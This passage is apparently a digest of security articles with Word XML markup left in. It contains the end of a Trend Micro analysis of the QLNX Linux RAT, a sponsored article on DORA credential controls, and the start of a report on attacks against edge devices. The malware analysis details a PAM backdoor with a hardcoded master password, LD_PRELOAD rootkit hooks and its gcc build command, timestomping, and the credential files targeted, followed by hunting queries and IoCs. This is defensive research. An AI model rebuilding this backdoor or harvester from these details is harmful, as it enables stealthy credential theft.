persistence methods that trigger boot or login, LD_PRELOAD triggers every program execution. Even if the malware process is terminated, the next time any command runs - even ps to check for it - the preload library spawns a new instance. The only way to stop the malware is to remove the /etc/ld.so.preload entry first, then kill the process. Removing the process without clearing the preload will immediately respawn it.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12. LD_PRELOAD Shared Library persistence installation process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Every dynamically-linked program triggers LD_PRELOAD: ls, cat, ssh, sudo, bash - ALL trigger the malware.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13. LD_PRELOAD Shared Library persistence trigger logic</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PAM backdoor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QLNX contains two distinct PAM backdoor implementations, each serving different operational purposes but sharing the same compile-on-target design approach and LD_PRELOAD delivery mechanism. Both implementations are shipped as embedded C source code rather than precompiled binaries. Compiling locally on the target host produces a shared library that matches the target's architecture, glibc version, and PAM headers exactly, avoiding compatibility issues that commonly arise when deploying precompiled binaries across different Linux distributions.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PAM inline-hook backdoor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inline-hook PAM backdoor is a sophisticated, multi-function interception library that provides plaintext credential harvesting from every authentication event, a master password (O$$f$QtYJK) bypass, and silently logs outbound SSH session data for lateral movement surveillance - all from a single shared object. The malware writes the source code to a temporary file /tmp/.pam_src_XXXXXX, compiles it with gcc, producing pam_security.so, then installs it via /etc/ld.so.preload, ensuring it is loaded into every dynamically-linked process that starts on the system, and timestomps itself against the real pam_unix.so to defeat forensic timeline analysis.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Figure 14. PAM backdoor C source code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module supports three actions: Install: Compiles and installs the backdoor, registers it in /etc/ld.so.preload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Uninstall: Removes the .so file and strips its entry from /etc/ld.so.preload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Harvest: Reads captured credentials from the log files, XOR-decrypts them, and sends them back to the C&amp;C.</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When the module is installed, it intercepts the PAM authentication process to harvest plaintext credentials, XOR-encrypts and stores them in /var/log/.ICE-unix for SSH and /var/log/.Test-unix for SSH, SCP, SU, and sudo, which can be sent to the C&amp;C if the attacker performs a harvest action.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PAM credential logger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malware also supports a simpler PAM credentials logger, which is embedded as C source code. The malware writes the source code to a temporary file /tmp/.pcs_XXXXXX, compiles it with gcc, producing /usr/lib/.libpam_cache.so, then installs it via /etc/ld.so.preload, ensuring it is loaded into every dynamically linked process that starts on the system. On each successful authentication, it extracts the service name, username, and authentication token and stores them in plaintext to /tmp/.pam_cache.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15. QLNX PAM backdoor credentials logger.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Rootkit analysis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Userland LD_PRELOAD rootkit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QLNX includes a command handler for deploying a userspace rootkit through the Linux dynamic linker's LD_PRELOAD mechanism. Unlike the eBPF rootkit controller (which manages kernel-level BPF maps), this component operates entirely in userspace by hijacking standard C library functions at the shared library level. The rootkit is not shipped as a pre-built binary. Instead, QLNX carries the full C source code as embedded string literals and compiles it directly on the target using the host's own gcc.</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Before attempting installation, the handler checks two prerequisites: root privileges (required to write to /etc/ld.so.preload) and the presence of gcc on the system. If either check fails, the command is rejected with a descriptive error message.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handler accepts three actions from the C&amp;C:</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Action ID Purpose Details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Install rootkit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Generates C source, compiles to shared object, registers in /etc/ld.so.preload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Remove rootkit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Removes the .so file and cleans the /etc/ld.so.preload entry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Status query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Reports whether the .so exists, whether /etc/ld.so.preload is configured, SELinux state, and gcc availability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8. Command actions supported by the QLNX userland LD_PRELOAD rootkit handler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Installation process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When the install action is received, the handler performs the following steps: Creates a temporary file via mkstemp("/tmp/.hide_src_XXXXXX") and renames it with a .c extension.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Writes the full rootkit C source code into the file using fprintf. The source is parameterized with the implant's own binary path, its current PID, and the names of files it needs to hide.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Forks a child process and invokes execlp("gcc", "gcc", "-shared", "-fPIC", "-Wl,-soname,libsecurity_utils.so.1", "-o", "/usr/lib/libsecurity_utils.so.1", &lt;source&gt;, "-ldl") to compile the shared object.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deletes the source file immediately after compilation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Checks whether /etc/ld.so.preload already contains an entry for libsecurity_utils.so.1. If not, appends it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Copies the atime and mtime timestamps from /usr/lib/libc.so.6 onto the newly created .so file using utimensat, making the rootkit's file timestamps match the system's C library to avoid standing out during forensic inspection.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Rootkit hooks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generated shared object intercepts eight libc functions using dlsym(RTLD_NEXT, ...) to resolve the original implementations. When any of these functions is called with a path or name matching the rootkit's hidden list, it returns ENOENT (file not found) or skips the entry, effectively making the target invisible to userland tools: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Hooked Function Effect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readdir / readdir64</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Skips directory entries matching hidden file names or hidden PIDs (checked via /proc/PID/comm)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stat / lstat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Returns ENOENT for hidden paths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__xstat / __lxstat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Same as above (legacy glibc stat wrappers)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Returns ENOENT for hidden paths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fopen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Returns NULL with ENOENT for hidden paths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access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Returns ENOENT for hidden paths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9. libc functions hooked by the QLNX userland LD_PRELOAD rootkit and their effects.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hidden names and paths are hardcoded into the generated source at compile time. They include the implant's own binary, the rootkit .so file itself (libsecurity_utils.so.1), the PAM backdoor module (pam_security.so), and the PAM credential log files (.ICE-unix and .Test-unix under /var/log/). The rootkit also hides the implant's own PID by reading /proc/PID/comm for each numeric directory entry and comparing it against the hidden process name.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16. QLNX LD_PRELOAD embedded C code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Because the rootkit is loaded via /etc/ld.so.preload, it is injected into every dynamically linked process on the system, including ls, find, stat, ps, and any other standard tools an administrator or forensic investigator might use.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eBPF rootkit controller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QLNX includes a built-in command handler that acts as the userland controller for an eBPF-based rootkit. It is important to note that this component does not contain the kernel-side eBPF program itself. Its role is limited to creating and managing BPF maps - kernel data structures designed to hold the list of items that should be hidden from the system. Upon receiving instructions from the C&amp;C server, the implant leverages the Linux kernel's BPF subsystem to conceal processes, files, and network ports from standard userland tools such as ps, ls, and netstat.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Before processing any hiding request, the handler performs three prerequisite checks: Root check: Verifies that the implant is running with root privileges. If not, the command is rejected immediately.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Kernel version check: Parses the kernel release string and requires kernel 4.18 or higher, which is the minimum version supporting the BPF map types used by this feature.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BPF availability probe: Attempts a test BPF map creation syscall. If the call fails (for example, when BPF support is disabled in the kernel configuration), the command is aborted.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Once all checks pass, the handler reads two fields from the incoming C&amp;C packet: an action ID (integer) and a string argument. The action ID determines the operation to perform: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Action ID Purpose Argument Details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Hide a process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PID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Inserts the PID into a BPF hash map (up to 64 entries)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Unhide a process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PID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Removes the PID from the same map</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Hide a file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File path</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Inserts the path into a BPF LRU hash map (up to 64 entries)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Unhide a file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File path</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Removes the path from the file map</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Hide a network port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Port number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Inserts the port into a BPF array map (up to 32 entries)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Unhide a network port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Port number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Removes the port from the port map</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Hide a connection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Not implemented; returns a message indicating this feature is not yet available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Status query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Returns a JSON object listing kernel version, BPF availability, and hidden PIDs, files, and ports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10. Actions supported by the QLNX eBPF rootkit controller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each action, the handler sends a response packet back to the C&amp;C containing a success flag and a status message.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17. QLNX ePBF rootkit controller internal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QLNX credential theft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When the C&amp;C operator triggers command 0x90 (credential harvest), QLNX executes a single routine that collects every secret on the host in one sweep. It runs four specialized sub-harvesters back-to-back: The first grabs SSH private keys (id_rsa, id_ed25519, id_ecdsa, id_dsa), known_hosts, and authorized_keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The second pulls login databases and cookies from Chrome, Chromium, and Firefox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The third walks a hardcoded table of developer and cloud config files including AWS credentials and config, Kubernetes kubeconfig, Docker's config.json, Git credentials and gitconfig, NPM's .npmrc, PyPI's .pypirc, GitHub CLI tokens from .config/gh/hosts.yml, HashiCorp Vault tokens, Terraform credentials, and any .env file in the user's home directory. The fourth reads /etc/shadow when running as root, along with shell history and additional token files. As a final touch, it even captures the current X11 clipboard contents via xclip/xsel.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Every collected item is tagged with its category, application name, file path, and raw content, and exfiltrated to the C&amp;C server.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 a typical developer workstation, this single command can: compromise entire cloud environments through stolen AWS and Kubernetes credentials; gain access to private source code repositories via Git and GitHub CLI tokens; hijack package publishing pipelines through NPM and PyPI auth tokens; and pivot laterally to every server in the user's SSH key chain. The breadth of this harvest means that a single infected developer system can become the entry point for a full-scale supply chain or cloud infrastructure breach.</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18. QLNX steals credentials from victim system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Files of interest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Tables 11 and 12 list the persistent files and temporary files used by QLNX.</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Path Description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/usr/lib/libsecurity_utils.so.1</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LD_PRELOAD rootkit .so</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/usr/lib/.libpam_cache.so</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PAM credential hook .so</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/etc/ld.so.preload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Modified (both .so paths appended)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/tmp/.pam_cache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Plaintext credential log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/var/log/.Test-unix</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Hidden log file for captured SSH passwords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/var/log/.ICE-unix</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Hidden log file for captured PAM passwords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/tmp/.X&lt;8+digits&gt;-lock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Single instance lock file (e.g., /tmp/.X12345678-lock)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~/.config/systemd/user/quasar_linux.service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Systemd user service persistence file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~/.config/autostart/quasar_linux.desktop</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XDG autostart persistence file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/etc/systemd/system/quasar_linux.service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Systemd system service persistence file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/etc/init.d/quasar_linux</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init.d script persistence file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11. Persistent files used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Path Description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/tmp/.hide_src_*.c</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LD_PRELOAD rootkit source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/tmp/.pcs_*</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PAM hook source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/tmp/.pam_src_*</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Temporary source file for PAM backdoor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12. Temporary files deleted after use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Conclusion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QLNX implant was built for long-term stealth and credential theft. What makes it particularly dangerous is not any single feature, but how its capabilities chain together into a coherent attack workflow: arrive, erase from disk, persist through six redundant mechanisms, hide at both userspace and kernel level, and then harvest the credentials that matter most.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QLNX systematically targets the files that underpin modern software development and cloud infrastructure: .npmrc (NPM registry tokens), .pypirc (PyPI upload keys), .git-credentials, .aws/credentials, .kube/config, and .docker/config.json. These are the keys to the software supply chain. A single compromised developer workstation could give the attacker the ability to publish trojanized packages to NPM or PyPI, inject backdoors into container images, or pivot from a personal laptop into production cloud environments.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This is not a theoretical risk. The LiteLLM supply chain compromise in March 2026 followed exactly this pattern: stolen credentials from one tool were used to trojanize a Python package with 3.4 million daily downloads. QLNX's capability set maps directly to every step of that kill chain.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combination of the rootkit, the PAM backdoor capable of silently intercepting plaintext passwords, and the P2P mesh network allowing implants to relay through each other all compound the difficulty of detection and eradication.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 Vision One customers are protected against the indicators of compromise documented in this analysis, with access to hunting queries, threat insights, and intelligence reports related to QLNX.</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Proactive security with Trend Vision OneTM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 Vision OneTM is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi- cloud environments.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 Vision OneTM Network Security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47135: HTTP: Backdoor.Linux.QLNX.A Runtime Detection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47136: TCP: Backdoor.Linux.QLNX.A Runtime Detection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 Vision OneTM Threat Intelligence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 stay ahead of evolving threats, Trend customers can access Trend Vision OneTM Threat Insights (opens in a new tab) which provides the latest insights from Trend Research on emerging threats and threat actors.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 Vision OneTM Threat Insights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Emerging Threats: Quasar Linux (QLNX): Quasar Linux (QLNX) - A Silent Foothold in the Supply Chain: Inside a Full-Featured Linux RAT With Rootkit, PAM Backdoor, Credential Harvesting and More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 Vision OneTM Intelligence Reports (IOC Sweeping)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Quasar Linux (QLNX) - A Silent Foothold in the Supply Chain: Inside a Full- Featured Linux RAT With Rootkit, PAM Backdoor, Credential Harvesting and More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Hunting queries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 Vision OneTM Search App</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 Vision OneTM customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Linux Hunting query for QLNX:</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Implant Binary Execution eventSubId:(2 OR 5) AND processFilePath:"quasar-implant"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Mutex Lock File objectFilePath:"/tmp/.X752e2ca1-lock"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LD_PRELOAD Rootkit Module objectFilePath:"/usr/lib/libsecurity_utils.so.1"</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Hidden SSH password log / Hidden PAM password log objectFilePath:("/var/log/.Test-unix" OR "/var/log/.ICE-unix")</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PAM Hook Source Dropper eventSubId:(101 OR 103) AND objectFilePath:/\/tmp\/\.pcs_[A-Za-z0-9]{6}/</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PAM Hook Compilation Activity processFilePath:/.*\/gcc/ AND processCmd:"-shared" AND processCmd:" "-fPIC" AND processCmd:"/usr/lib/.libpam_cache.so" AND processCmd:"-lpam"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hunting queries are available for Trend Vision OneTM customers with Threat Insights Entitlement enabled.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Indicators of Compromise (IoCs)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Primary modules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SHA256 File Name Detection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ea1d34b21b739a6bbf89b3f7e67978005cf7f3eda612cefc7eac1c8ead7c5545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Quasar-implant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Backdoor.Linux.QLNX.A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82DAA93219BA40A6E41CDF3174BA57EB5D3383D1CD805584E9954EB0200182A1</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libsecurity_utils.so.1</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Backdoor.Linux.QLNX.A.comp</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42D0C420EB5FE181388F2E4F0B7D7C0D302971E7A06FDC1BEC481B68C8CCAE1F</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pam_security.so</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Backdoor.Linux.QLNX.A.comp</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C99CF0DC1EF1057D713CB082ACAF42E4DF4656809C91741752BDDCAB39BBFACA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hide_src_39ZzHo.c</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Backdoor.Linux.QLNX.A.comp</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EA89CAAB82181881D971BE312412795051F6322B105C8B9D29CFB5729FAB8D33</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pam_src_51YyC3.c</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Backdoor.Linux.QLNX.A.comp</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417430b2d4ae8d005224a9ff5dcb4007d452338acbcbcbb62c4e8ed1a70552dd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libpam_cache.so</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Backdoor.Linux.QLNX.A.comp</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d55549d5655e2f202e215676f4bdb0994ea08a93d15ec4ded413f64cfa7facc8</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pcs_a3kf9x.c</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Backdoor.Linux.QLNX.A.comp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.05.04 17:55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.trendmicro.com/en_us/research/26/e/quasar-linux-qlnx-a-silent-foothold-in-the-software-supply-chain.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DORA and operational resilience: Credential management as a financial risk control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by Passwork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April 24, 2026 10:10 AM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Author: Eirik Salmi, System Analyst at Passwork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When a threat actor walks into your network using a legitimate username and password, which control stops them?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most financial institutions, the honest answer is: nothing catches it immediately. The attacker looks like an authorised user. They move laterally, escalate privileges, and map critical systems for an average of 186 days before the breach is even identified - and a further 55 days to contain it - according to IBM's Cost of a Data Breach Report (2025).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then, the operational damage is done, and the regulatory clock has already started.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 January 17, 2025, the Digital Operational Resilience Act (DORA) entered into application across the EU. Article 9 of the regulation makes credential security a binding financial risk control, with supervisory consequences for institutions that fall short.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question is no longer whether your authentication posture meets best practice. It is whether it meets the law - and whether you can prove it.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article traces the specific Article 9 requirements that govern credential management, explains why a compromised password is an operational resilience failure under DORA's framework, and outlines the practical controls that close the gap. The threat that DORA was built to counter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Stolen credentials are the single largest initial access vector in 2025, accounting for 22% of all data breaches, per Verizon's Data Breach Investigations Report. For financial institutions, the sector-specific cost of that exposure averages $5.56 million per incident, according to IBM's Cost of a Data Breach Report - down from $6.08 million in 2024, yet still the second-highest of any industry globally.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supply side of credential theft has been fully industrialised. Initial Access Brokers sell verified corporate network access for an average of $2,700, with 71% of listings including privileged credentials - pre- packaged access that requires no technical skill to exploit, according to Rapid7 research.</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Infostealers such as Lumma, RisePro, StealC, Vidar, and RedLine automate credential harvesting at scale. IBM X-Force data shows their delivery via phishing increased 84% year-on-year in 2024, with 2025 data pointing to an even steeper trajectory.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DORA's Article 9 exists precisely to interrupt this chain. The regulation reflects a documented, ongoing threat to the operational continuity of European financial markets.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Keep your credentials DORA-ready with Passwork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DORA Article 9 requires strong authentication, least-privilege access, and documented controls.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Passwork delivers all three - self-hosted, ISO 27001 certified, with full audit logs your compliance team can export on demand. Try Passwork Free What DORA Article 9 actually requires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Article 9 of DORA - titled "Protection and Prevention" - sits within the ICT risk management framework mandated by Article 6. It sets out specific technical and procedural obligations that financial entities must implement.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Two provisions are directly relevant to credential management.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Article 9(4)(c) requires financial entities to "implement policies that limit the physical or logical access to information assets and ICT assets to what is required for legitimate and approved functions and activities only." This is the least-privilege principle, stated as a legal obligation.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Article 9(4)(d) goes further, requiring entities to "implement policies and protocols for strong authentication mechanisms, based on relevant standards and dedicated control systems, and protection measures of cryptographic keys whereby data is encrypted based on results of approved data classification and ICT risk assessment processes."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Unpacking that language in operational terms: MFA is mandatory. The reference to "relevant standards" points directly to FIDO2/WebAuthn - the most widely deployed authentication standard currently resistant to Adversary-in-the-Middle (AiTM) phishing kits, which can bypass SMS and TOTP- based MFA in real time. Cryptographic key management is a regulatory requirement.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Privileged access management (PAM) tools are not named explicitly in the regulation - but the controls they deliver map directly onto Article 9's requirements. Session recording, just-in-time (JIT) access provisioning, and privileged credential vaulting are precisely the "dedicated control systems" the regulation describes.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Institutions that have not deployed these controls face a compliance gap that supervisors can act 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European Banking Authority (EBA) and ESMA's Regulatory Technical Standards under DORA provide additional specificity on ICT risk management requirements, reinforcing the Article 9 baseline with sector-specific implementation guidance. Credential compromise as an operational resilience failure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DORA's stated purpose is to ensure financial entities can withstand, respond to, and recover from ICT disruptions. A credential compromise looks entirely different through that lens than it does through a security incident lens.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an average dwell time of 186 days, a compromised credential does not produce a discrete security event. It produces a sustained, invisible threat to operational continuity - an attacker moving laterally, escalating privileges, and mapping critical systems while appearing as a legitimate user. It is a direct threat to the operational continuity DORA is designed to protect.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breach of France's national bank registry in January 2026 made the mechanics concrete. A threat actor obtained the credentials of a single civil servant with access to Ficoba - the interministerial database holding records on every bank account opened in France.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Using only that one account, the attacker accessed and extracted data on 1.2 million bank accounts, including IBANs, account holder names and addresses, and tax identification numbers.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affected system was taken offline, operations at the registry were disrupted, and the incident was reported to France's data protection authority, CNIL. The attack required no technical sophistication.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Under DORA, an incident of that scale at a financial entity would trigger mandatory reporting obligations under Article 19 - an initial notification within 4 hours of classification (and no later than 24 hours after detection), an intermediate report within 72 hours, and a final report within one month. The third-party dimension: Vendor credentials are your credentials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DORA's Chapter V places explicit obligations on financial entities regarding ICT third-party risk. The compliance perimeter does not stop at the institution's own systems.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Santander breach in May 2024 is the European reference point. Attackers used credentials stolen from employees of Snowflake to access a database containing customer and employee data across Spain, Chile, and Uruguay.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credentials had been harvested months earlier by infostealer malware infecting contractor workstations. None of the compromised Snowflake accounts had multi-factor authentication enabled.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entry point was not inside Santander. It was a vendor's weak authentication posture - and it exposed data belonging to one of Europe's largest banks without a single exploit being written.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Under DORA, a financial institution whose critical ICT provider suffers a credential-based breach faces direct regulatory exposure. Institutions must contractually require equivalent authentication standards from their vendors and audit compliance against those requirements.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vendor's password policy gap is not the vendor's problem alone - it is the financial entity's regulatory liability. Building a DORA-compliant credential management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Meeting Article 9's requirements demands a structured programme across four areas.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Deploy phishing-resistant MFA first. FIDO2/WebAuthn-based authentication - hardware security keys, passkeys, platform authenticators. SMS and TOTP- based one-time passwords are not adequate against current attack techniques. Enforce phishing-resistant MFA for all users, with particular rigour on privileged accounts and remote access paths.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Enforce least-privilege access. JIT provisioning - granting elevated access only for the duration of a specific task - eliminates the standing privileges that make credential theft so damaging. Deactivate accounts immediately on offboarding. Dormant accounts are among the most common and most avoidable attack vectors.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Vault all credentials. Service account passwords, API keys, and privileged credentials must be stored in an encrypted, access-controlled credential vault. Manual credential management at scale is operationally unworkable and produces no audit trail. A business password manager Passwork - deployed on-premise within the institution's own infrastructure - provides the encrypted vaulting, granular access controls, and complete activity history that Article 9 demands.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Monitor continuously. Anomalous login behaviour - unusual geolocations, off- hours access, lateral movement patterns - must trigger automated alerts. Reducing that 186-day average dwell time is the single most effective lever for cutting both financial exposure and DORA incident reporting obligations.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All four controls depend on the same foundation: how credentials are stored, shared, accessed, and monitored. Without structure at that layer, even well-designed policies fail at execution. How Passwork supports DORA compliance in practice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Passwork is a corporate password manager certified to ISO/IEC 27001 and available as a self-hosted deployment - meaning your credential data never leaves your own infrastructure.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financial entities navigating DORA's Chapter V supply chain obligations, that distinction matters: a third-party SaaS credential store introduces exactly the kind of ICT dependency the regulation requires you to govern.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institutions working through the four controls above, Passwork addresses the credential management dimension of each.</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MFA enforcement across the credential layer. Passwork supports biometric, passkey, and security key MFA natively, with SAML SSO and LDAP integration for enterprise environments.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Role-based access control and least privilege. Permissions are assigned at vault and folder level, inherited from AD or LDAP groups, and updated automatically on directory changes. Offboarding revokes access to shared credentials in a single operation - logged and timestamped, producing the evidence an investigator will request under Article 9(4)(c).</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Privileged account inventory and secure sharing. Passwork provides a structured, searchable repository of all organisational credentials, including shared administrative accounts. Encrypted vault sharing replaces informal channels that leave no audit trail and cannot be revoked.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Audit logs for compliance documentation. Every credential access, permission change, password reset, and sharing event is recorded in a tamper-evident log, exportable for compliance reporting and integrable with SIEM systems. A structured activity history is a substantively stronger response to a regulator than a policy document alone.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DORA compliance is as much an evidence problem as a technical one. The institutions that navigate enforcement most effectively are those that can produce documentation on demand. Act before the audit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DORA has converted credential management from a security best practice into a binding financial risk control. Articles 9(4)(c) and 9(4)(d) are explicit: least-privilege access, strong authentication, and cryptographic key protection are legal obligations for every financial entity operating in the EU.</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Operational resilience begins with identity - and identity begins with controlling who holds the keys.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Audit your credential controls against Article 9, document the findings, and have the evidence ready before a regulator asks. Under DORA, the absence of documentation is itself a finding.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Passwork is designed for exactly this situation: a self-hosted password manager that keeps credential data inside your own infrastructure, enforces MFA across every access point, and generates the tamper-evident audit logs that turn a compliance conversation from a liability into a demonstration. ISO/IEC 27001 certified, with LDAP and SAML SSO integration for enterprise environments.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Start your free Passwork trial - full functionality, no limitations.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and written by Passwork.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.04.24 19:01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/dora-and-operational-resilience-credential-management-as-a-financial-risk-control/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Edge Under Siege: How State-Sponsored Actors Exploit Your Perimeter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Edge devices have become a primary entry point for state-sponsored espionage, giving attackers a cheaper, faster path to network access, credential theft, and traffic interception. Our report examines the threat landscape, economics, and actor activity driving this shift, along with what CISOs and security leaders can do to respond.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April 20, 2026</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TrendAI Threat Research</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many years, the front door to large enterprises and government organizations for state-sponsored actors was phishing. This has now changed: Edge devices, such as VPN gateways, firewalls, and network appliances, have increasingly become a primary target as an initial access vector for state-sponsored espionage operations. This shift is not temporary and reflects a strategic recalculation by adversaries who identify and exploit the least-defended, high-value assets on enterprise networks: unmanaged edge infrastructure.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report analyzes publicly available studies on vulnerability trends from 2024 to date, along with threat actor operations, economic drivers, and leaked operational data, to explain why edge devices are being systematically targeted and what CISOs and security leaders must know to respond.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Our key takeaways include the following: Edge devices are now one of the most common initial access vectors for state-sponsored espionage. Publicly available data shows that exploitation increased from 3% to 22% of all exploitation incidents in a single year. We assess this to be a structural shift rather than an anomaly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Attacker economics are overwhelmingly favorable towards exploiting edge devices. Edge device exploits cost US$30,000 - US$100,000, which is one- third to one-tenth the cost of browser or mobile exploits while enabling broad network access, credential harvesting, and traffic interception. Meanwhile, it takes defenders an average of 30 days to patch, while attackers weaponize patches within hours. For further details, see Appendix B: Vulnerability Broker Pricing in our report.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>China-aligned actor groups operate as a coordinated ecosystem. Multiple threat actors (e.g., UNC5221, Earth Estries aka Salt Typhoon, Volt Typhoon) share tooling, divide targets, and probably benefit from state-directed vulnerability pipelines. We do not view this as an isolated activity, as it appears strategic, scaled, and is accelerating.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
